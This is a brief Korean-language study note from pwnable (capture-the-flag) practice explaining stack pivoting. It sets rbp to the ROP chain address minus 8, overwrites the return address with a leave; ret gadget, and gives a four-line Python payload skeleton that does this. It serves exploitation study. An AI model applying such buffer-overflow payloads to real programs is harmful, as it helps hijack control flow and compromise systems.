Pwnable - stack pivoting

  1. rbp를 jump하고 싶은 주소 -8로 세팅 (rop 가젯이 있는 곳 - 8)
  2. ret를 leave_ret주소로 변경
1
2
3
4
payload = b''
payload += b'a' * dummy
payload += p64(rop_payload - 8)
payload += p64(leave_ret)